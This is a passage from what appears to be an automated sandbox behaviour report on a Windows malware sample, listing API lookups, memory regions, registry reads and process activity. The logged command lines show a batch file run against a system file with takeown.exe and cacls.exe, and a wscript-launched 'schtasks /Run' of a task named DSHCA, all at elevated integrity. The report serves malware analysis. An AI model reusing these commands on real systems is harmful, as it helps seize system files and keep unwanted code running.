1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:32 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #137: cmd.exe
135
0
| Information | Value |
|---|---|
| ID | #137 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:53, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbe0 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
864
0x
C4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002f0000 | 0x002f0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00303fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00311fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00313fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00333fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00483fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00490fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x004b0000 | 0x0056dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x009bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x009c0000 | 0x00cf6fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f940000 | 0x7f940000 | 0x7fa3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fa40000 | 0x7fa40000 | 0x7fa62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fa66000 | 0x7fa66000 | 0x7fa66fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa69000 | 0x7fa69000 | 0x7fa6bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa6c000 | 0x7fa6c000 | 0x7fa6efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa6f000 | 0x7fa6f000 | 0x7fa6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (75)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
10 | |
| Get Info | - | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
35 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 94 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 56, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xa44, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xeec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (31)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
8 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #138: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #138 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:53, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa70 |
| Parent PID | 0xe2c (c:\windows\syswow64\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1A0
0x
C50
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000d40000 | 0x00d40000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x00d4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00d53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d70000 | 0x00d70000 | 0x00d83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00ecffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ed0000 | 0x00ed0000 | 0x00ed3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ee0000 | 0x00ee0000 | 0x00ee0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ef0000 | 0x00ef0000 | 0x00ef1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f00000 | 0x00fbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x00ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001030000 | 0x01030000 | 0x0103ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x011affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011b0000 | 0x011b0000 | 0x012affff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x0555ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05560000 | 0x05896fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f060000 | 0x7f060000 | 0x7f15ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f160000 | 0x7f160000 | 0x7f182fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f188000 | 0x7f188000 | 0x7f18afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f18b000 | 0x7f18b000 | 0x7f18dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f18e000 | 0x7f18e000 | 0x7f18efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f18f000 | 0x7f18f000 | 0x7f18ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 45, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
